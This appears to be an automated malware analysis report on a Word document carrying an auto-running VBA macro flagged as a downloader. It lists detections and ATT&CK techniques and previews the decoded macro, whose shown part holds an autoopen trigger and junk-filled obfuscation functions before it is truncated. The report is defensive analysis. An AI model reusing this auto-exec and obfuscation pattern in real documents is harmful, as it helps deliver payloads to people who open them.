MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is an OLE document containing a VBA macro. The macro is triggered by the 'autoopen' function and utilizes a Shell() call, indicating an attempt to execute arbitrary commands. This is strongly suggestive of a downloader or dropper functionality, where the macro is used to fetch and execute a secondary stage payload. The ClamAV detection 'Doc.Macro.DollarShell-6346616-0' further supports this assessment.
Heuristics 7
-
ClamAV: Doc.Macro.DollarShell-6346616-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11672 bytes |
SHA-256: 319123e9baf03c9d8af2ec2707b73e5682ce5099c0f3c07b4cbbc4b4881513b0 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub autoopen() RZwZYPM End Sub Function kNCwPPkFd() Dim GutFDFNybds(8089) GutFDFNybds(6809) = 4589 + 1558 + 9452 + 314 / 9108 - 6266 - 5810 + 1955 + 8037 + 3406 GutFDFNybds(5117) = 5332 + 2554 / 752 - 2938 - 4055 - 8779 + 3274 + 9423 GutFDFNybds(4342) = sHVnYaZuR GutFDFNybds(2382) = UfNMzVwuM GutFDFNybds(557) = xLdSpLf GutFDFNybds(629) = vTTKYGKmuv GutFDFNybds(2795) = CrmBcuvWC GutFDFNybds(2405) = exEBCkAL GutFDFNybds(4451) = pgGHFPYZdy GutFDFNybds(2122) = gVxXHMhTM GutFDFNybds(5029) = nTMxXxtDL GutFDFNybds(3250) = cKcpvXG GutFDFNybds(3999) = FxMPYCNRWe End Function Function gkCetzrWsg() Dim zvDNUZB(1233) zvDNUZB(595) = 1250 + 7842 + 986 + 4530 / 4970 / 9908 - 7757 - 3381 - 2163 + 4944 zvDNUZB(975) = tRsMZML zvDNUZB(572) = TDYFhcgKE zvDNUZB(709) = bMxWLzh zvDNUZB(262) = vZVpxwdDxev zvDNUZB(228) = XwwERktFf zvDNUZB(81) = FttyLXGgdKD zvDNUZB(332) = MkdhmBUTY zvDNUZB(684) = vSCCfPHfr zvDNUZB(806) = WXpAhFrxnd zvDNUZB(975) = PtHxpePczMs zvDNUZB(301) = CDLgXUKry zvDNUZB(182) = UXMuYDaW zvDNUZB(184) = BpCsfEcnZ zvDNUZB(158) = DfktxzuL zvDNUZB(303) = SvVSrGyauu zvDNUZB(489) = MfmLRttRGDk zvDNUZB(180) = fgFFvVrze zvDNUZB(576) = EMZSGKM zvDNUZB(535) = gACHwUa zvDNUZB(761) = SHpTxZGK zvDNUZB(644) = KbzdzhnNBZy zvDNUZB(1105) = XfyPudbBNNM End Function Function hzvmYnYUkw() Dim yyPnEeM(6298) yyPnEeM(4531) = 1341 + 2750 + 173 + 3719 / 9165 / 2484 / 9892 - 2361 + 9574 + 6019 yyPnEeM(456) = 8690 + 3942 + 2354 + 1958 / 1337 - 6160 + 2528 + 5271 + 4760 yyPnEeM(2204) = 1384 + 4612 + 9186 + 9240 / 2710 / 4006 - 3565 + 7032 yyPnEeM(3336) = ynLcTsuK yyPnEeM(1822) = kuugbMCnpa yyPnEeM(1442) = gDPKYpefhfx yyPnEeM(2591) = uXAXDsZDDBn yyPnEeM(2934) = LUrwbKrVfF yyPnEeM(2858) = dpeycnMTM yyPnEeM(2780) = dRzuUFD yyPnEeM(1901) = eGYpXwg yyPnEeM(2508) = DyDFpzM yyPnEeM(4870) = VhAUkzxha yyPnEeM(135) = FyUaYZS yyPnEeM(1148) = YyMmyhecM yyPnEeM(2157) = YYzMytSzB yyPnEeM(5411) = WApKTcg yyPnEeM(2093) = PDwYmkgPCer yyPnEeM(2462) = AhpxSZeNwZs yyPnEeM(3939) = HrNECVA yyPnEeM(1683) = rZPUdnYssP yyPnEeM(509) = dtnWNFbSr yyPnEeM(4444) = BfxMzwg yyPnEeM(5914) = mprHLXwTCyc yyPnEeM(4473) = bbcKDBxKh yyPnEeM(4062) = eZPPGHpFB yyPnEeM(1949) = ueRzgKEk yyPnEeM(2535) = vVwXdDwuVp yyPnEeM(923) = TAMTGzRPa End Function Function KkKDUAzcSw() Dim ngeCtBrdPp(5921) ngeCtBrdPp(1921) = 6442 + 3737 + 4511 + 458 / 6750 / 6084 / 2051 - 7772 - 9783 + 4888 ngeCtBrdPp(3344) = 4180 + 4804 + 628 / 4315 / 7064 / 7425 - 5411 + 3106 + 3633 ngeCtBrdPp(3515) = 4628 + 5814 + 8777 / 960 / 7435 - 9440 + 5848 + 5007 + 3155 ngeCtBrdPp(5548) = DzwvmaYBu ngeCtBrdPp(5615) = btDwYCHU ngeCtBrdPp(4139) = NzbytHV ngeCtBrdPp(3241) = swrDKwrtL ngeCtBrdPp(3078) = VXpHRpU ngeCtBrdPp(2615) = pKprMaSe ngeCtBrdPp(954) = WYBvzXcc ngeCtBrdPp(919) = vFtVCczS ngeCtBrdPp(2432) = UwrbAZtUSE ngeCtBrdPp(1307) = ptawGGZTeyk ngeCtBrdPp(3512) = TemDwAh ngeCtBrdPp(2411) = KTfLESnWhY ngeCtBrdPp(5264) = szwrFKdBE ngeCtBrdPp(4510) = ryrTWZFNuz ngeCtBrdPp(1609) = TMGMsmaMGa ngeCtBrdPp(4054) = zkTrhfwxp ngeCtBrdPp(4184) = EsEULEhrG ngeCtBrdPp(5510) = hYbMcXxZKfX ngeCtBrdPp(767) = fnsRHMvnRBa ngeCtBrdPp(4645) = kHtsCWm ngeCtBrdPp(99) = xvwrLRvVT ngeCtBrdPp(1167) = dNcmgHngS ngeCtBrdPp(5840) = wTUfXsam ngeCtBrdPp(5655) = dBuxdDDYf End Function Function ZtBSGbLzXHa() Dim XgnefYfX(9516) XgnefYfX(1806) = 4020 + 3310 + 5251 + 793 / 1338 / 1485 / 6297 - 8729 - 7367 + 7712 XgnefYfX(6509) = 4789 + 9467 / 7692 / 2109 - 5593 - 7409 + 264 + 1815 + 9196 XgnefYfX(5975) = XUMzkLWpc XgnefYfX(3632) = nAsuaDm XgnefYfX(9384) = fDUkuEeFbTC XgnefYfX(1556) = ZESzdUFxPnt XgnefYfX(6100) = abnKyfSyc XgnefYfX(7632) = LuCUcUywe ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.